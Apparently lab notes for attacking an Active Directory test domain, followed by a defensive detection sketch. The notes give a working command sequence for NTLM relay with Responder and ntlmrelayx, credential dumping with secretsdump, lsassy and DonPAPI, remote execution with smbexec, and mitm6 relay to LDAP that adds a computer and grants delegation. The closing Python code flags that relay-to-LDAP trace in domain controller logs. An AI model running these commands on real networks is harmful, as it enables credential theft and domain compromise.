You have captured hashes with Responder but were not able to crack them.
Use cme to find the hosts where SMB signing is False:
cme smb 192.168.56.10-23 --gen-relay-list relay.txt
cp relay.txt smb_targets.txt
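# Turn off Responder's own HTTP and SMB servers so ntlmrelayx.py can listen on those ports
sudo sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'HTTP ='
sudo sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf && cat /usr/share/responder/Responder.conf | grep --color=never 'SMB ='
# Remove Responder's database of earlier captures
sudo rm /usr/share/responder/Responder.db
# Relay to the hosts in smb_targets.txt and keep the relayed sessions open behind a SOCKS proxy
ntlmrelayx.py -tf smb_targets.txt -of netntlm -smb2support -socks
# Run Responder on the lab interface
sudo responder -I vboxnet0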
ntlmrelayx> socks
Protocol  Target         Username            AdminStatus  Port
--------  -------------  ------------------  -----------  ----
SMB       192.168.56.22  NORTH/ROBB.STARK    FALSE        445
SMB       192.168.56.22  NORTH/EDDARD.STARK  TRUE         445
SMB       192.168.56.23  NORTH/ROBB.STARK    FALSE        445
SMB       192.168.56.23  NORTH/EDDARD.STARK  FALSE        445
proxychains secretsdump.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'
proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22
proxychains DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'
proxychains smbclient.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
proxychains smbexec.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
mitm6: relaying NTLM to LDAP
sudo mitm6 -i vboxnet0 -d essos.local -d sevenkingdoms.local -d north.sevenkingdoms.local --debug
ntlmrelayx.py -6 -wh wpadfakeserver.essos.local -t ldaps://meereen.essos.local --add-computer relayedpccreate --delegate-access
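
A detection sketch for what the relay-to-LDAP step above leaves on a domain controller, added here as an example and not part of the original notes: a computer account creates another computer account (Security event 4741) and then writes msDS-AllowedToActOnBehalfOfOtherIdentity on its own object (event 5136). Assumptions: both events are collected (5136 needs Directory Service Changes auditing), the relayed identity is a computer account, and the names WKSTN01, WS042, helpdesk.admin, the timestamps and the dict layout are constructed.

```python
from datetime import datetime

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"

# Constructed sample events (flattened Security-log fields); WKSTN01, WS042,
# helpdesk.admin and the timestamps are made up for illustration.
EVENTS = [
    {"id": 4741, "time": "2024-01-01T10:00:05", "SubjectUserName": "WKSTN01$",
     "TargetUserName": "relayedpccreate$"},
    {"id": 5136, "time": "2024-01-01T10:00:07", "SubjectUserName": "WKSTN01$",
     "ObjectDN": "CN=WKSTN01,CN=Computers,DC=essos,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"id": 4741, "time": "2024-01-01T11:30:00", "SubjectUserName": "helpdesk.admin",
     "TargetUserName": "WS042$"},
    {"id": 5136, "time": "2024-01-01T12:00:00", "SubjectUserName": "helpdesk.admin",
     "ObjectDN": "CN=WS042,CN=Computers,DC=essos,DC=local",
     "AttributeLDAPDisplayName": "description"},
]


def cn_of(dn):
    """Return the value of the first RDN of a distinguished name, upper-cased."""
    return dn.split(",", 1)[0].split("=", 1)[1].upper()


def find_relay_rbcd(events, window_s=600):
    """Flag a computer account that creates another computer account (4741) and
    then writes the RBCD attribute on its own object (5136) within window_s."""
    created = {}  # subject account -> [(time, new computer name), ...]
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        subject = ev["SubjectUserName"].upper()
        if ev["id"] == 4741 and subject.endswith("$"):
            created.setdefault(subject, []).append((when, ev["TargetUserName"]))
        elif (ev["id"] == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR
              and cn_of(ev["ObjectDN"]) == subject.rstrip("$")):
            for t0, new_pc in created.get(subject, []):
                if 0 <= (when - t0).total_seconds() <= window_s:
                    alerts.append({"relayed_account": subject,
                                   "new_computer": new_pc,
                                   "object": ev["ObjectDN"]})
    return alerts


if __name__ == "__main__":
    for alert in find_relay_rbcd(EVENTS):
        print(alert)
```

The 600-second window is an arbitrary starting value; a relayed user account instead of a computer account would not match this rule and needs its own check.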